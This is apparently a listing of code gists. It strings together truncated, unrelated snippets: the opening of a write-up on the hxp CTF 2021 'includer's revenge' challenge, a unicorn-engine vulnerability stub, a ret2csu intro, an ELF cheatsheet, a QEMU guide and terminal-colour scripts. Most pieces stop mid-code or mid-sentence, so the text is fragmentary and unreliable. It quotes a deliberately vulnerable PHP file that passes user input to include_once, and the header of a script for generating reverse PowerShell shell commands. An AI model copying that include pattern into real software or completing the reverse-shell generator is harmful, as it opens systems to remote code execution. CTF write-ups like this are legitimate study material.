loknop

Solving "includer's revenge" from hxp ctf 2021 without controlling any files

The challenge

The challenge was to achieve RCE with this file:

<?php ($_GET['action'] ?? 'read' ) === 'read' ? readfile($_GET['file'] ?? 'index.php') : include_once($_GET['file'] ?? 'index.php');

Some additional hardening was applied to the php installation to make sure that previously known solutions wouldn't work (for further information read this writeup from the challenge author).

I didn't solve the challenge during the competition - here is a writeup from someone who did - but since the idea I had differed from the techniques used in the published writeups I read (and I thought it was cool :D), here is my approach.

jwang-a

[Vulnerability Type Other]
  CWE-697: Incorrect Comparison

[Vendor of Product]
  unicorn-engine

[Affected Product Code Base]
  unicorn engine - <=2.0.0

[Affected Component]

aaaddress1

#include <windows.h>
#include <iostream>

bool readBinFile(const char fileName[], char*& bufPtr, DWORD& length) {
	if (FILE* fp = fopen(fileName, "rb")) {
		fseek(fp, 0, SEEK_END);
		length = ftell(fp);
		bufPtr = new char[length + 1];
		fseek(fp, 0, SEEK_SET);
		fread(bufPtr, sizeof(char), length, fp);

x0nu11byt3

ELF Format Cheatsheet

Introduction

Executable and Linkable Format (ELF), is the default binary format on Linux-based systems.

Compilation

kaftejiman

ret2csu

I wanted to make a clean and simple explanation of ret2csu exploitation technique as I didnt get it easily with the ressources I found on google. As far as my understanding goes. You should take it with a grain of salt.

Tests carried on a AMD64 Linux Ubuntu.

Table of Contents

niw

How to run Windows 10 on ARM or Ubuntu for ARM64 in QEMU on Apple Silicon Mac

Here is easy steps to try Windows 10 on ARM or Ubuntu for ARM64 on your Apple Silicon Mac. Enjoy!

NOTE: that this is current, 10/1/2021 state.

Running Windows 10 on ARM

1. Install Xcode from App Store or install Command Line Tools on your Mac

experimatt

// This script takes an iTerm Color Profile as an argument and translates it for use with Visual Studio Code's built-in terminal.
// 
// usage: `node iterm-colors-to-vscode.js [path-to-iterm-profile.json]
// 
// To export an iTerm Color Profile:
//   1) Open iTerm
//   2) Go to Preferences -> Profiles -> Colors
//   3) Other Actions -> Save Profile as JSON
// 
// To generate the applicable color settings and use them in VS Code:

tothi

#!/usr/bin/env python3
#
# generate reverse powershell cmdline with base64 encoded args
#

import sys
import base64

def help():
    print("USAGE: %s IP PORT" % sys.argv[0])

2xAA

/* Generate colors using https://github.com/andreyvit/plist-to-json */
const col = [] // run your .itermcolors file through the above parser and replace the array with the output
      
function componentToHex(c) {
  const hex = c.toString(16)
  return hex.length === 1 ? `0${hex}` : hex
}

const mapping = {
  'terminal.background':'Background Color',

rene-d

# SGR color constants
# rene-d 2018

class Colors:
    """ ANSI color codes """
    BLACK = "\033[0;30m"
    RED = "\033[0;31m"
    GREEN = "\033[0;32m"
    BROWN = "\033[0;33m"
    BLUE = "\033[0;34m"